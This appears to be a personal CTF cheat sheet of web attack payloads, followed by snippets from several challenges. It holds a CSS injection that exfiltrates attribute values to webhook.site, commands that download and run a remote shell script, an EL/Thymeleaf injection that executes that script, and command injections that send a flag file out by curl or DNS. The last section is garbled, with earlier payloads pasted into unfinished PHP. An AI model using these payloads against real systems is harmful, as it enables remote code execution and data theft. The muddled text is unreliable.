Bùi Đức Anh Khoa matuhn

## hitb
Azure;}a[class="card-link"][data-target^="#share-a"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-a");}a[class="card-link"][data-target^="#share-b"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-b");}a[class="card-link"][data-target^="#share-c"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-c");}a[class="card-link"][data-target^="#share-d"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-d");}a[class="card-link"][data-target^="#share-e"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-e");}a[class="card-link"][data-target^="#share-f"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-f");}a[class="card-link"][data-target^="#share-g"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-g");}a[class="card-link"][data-target^="#share-h"]{background:url("http://webhook.site/5162cb3f-5af0-4de2-97ef-49b5970b2219/?e-h");}a

## BackconnectWithoutNetcat
wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh
bash shell.sh

EL Injection:
<p th:text="${T(java.lang.Runtime).getRuntime().exec('wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh; bash shell.sh')}" ></p>

RCE:
google.com;wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh; bash shell.sh')}"

## RCE
-d"@/home/munchi/munchi/flag" http://webhook.site/18b1a799-1684-4125-afa7-13b37b9c6964
google.com | cat /home/munchi/munchi/flag | curl –F":data=@-" http://webhook.site/18b1a799-1684-4125-afa7-13b37b9c6964
google.com | ping ${cat /home/munchi/munchi/flag}.2c7008c15444c1c5809f.d.requestbin.net

## BetBungbuy
<?php include('header.php'); ?>

<?php
class khoadeptrai
{
  var $jackpot;
  var $enter;
  var $value;
}
?>

## BetBungbet
<?php include('header.php'); ?>

<?php
class khoadeptrai
{
  var $jackpot;
  var $enter;
  var $value;
  var $otp;
}

## Only Dr.Strange can do this
if (isset ($_GET['number'])) {
    if ($_GET['number'] == $_SESSION['number'])
        die ('Flag: '.$flag);
    else
        $result .='<p>Wrong guess.</p></br>'.$_SESSION['number'];
}
$_SESSION['number'] = (rand(1,999)^rand(1,999)+rand(1,999))/rand(1,999);

## babywarmup
<?php

	if (!isset($_SESSION['level'])){
		$_SESSION['level'] = 'level1';
	}

	if ($_SESSION['level'] == 'level1'){
		if ($_SERVER['REQUEST_METHOD'] === 'POST'){
			$_SESSION['level'] = 'level2';
		}
	wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh
	bash shell.sh

	EL Injection:
	<p th:text="${T(java.lang.Runtime).getRuntime().exec('wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh; bash shell.sh')}" ></p>

	RCE:
	google.com;wget https://raw.githubusercontent.com/matuhn/CTFtricks/master/shell.sh; bash shell.sh')}"
	-d"@/home/munchi/munchi/flag" http://webhook.site/18b1a799-1684-4125-afa7-13b37b9c6964
	google.com \| cat /home/munchi/munchi/flag \| curl –F":data=@-" http://webhook.site/18b1a799-1684-4125-afa7-13b37b9c6964
	google.com \| ping ${cat /home/munchi/munchi/flag}.2c7008c15444c1c5809f.d.requestbin.net
	<?php include('header.php'); ?>

	<?php
	class khoadeptrai
	{
	var $jackpot;
	var $enter;
	var $value;
	}
	?>
	if (isset ($_GET['number'])) {
	if ($_GET['number'] == $_SESSION['number'])
	die ('Flag: '.$flag);
	else
	$result .='<p>Wrong guess.</p></br>'.$_SESSION['number'];
	}
	$_SESSION['number'] = (rand(1,999)^rand(1,999)+rand(1,999))/rand(1,999);
	<?php

	if (!isset($_SESSION['level'])){
	$_SESSION['level'] = 'level1';
	}

	if ($_SESSION['level'] == 'level1'){
	if ($_SERVER['REQUEST_METHOD'] === 'POST'){
	$_SESSION['level'] = 'level2';
	}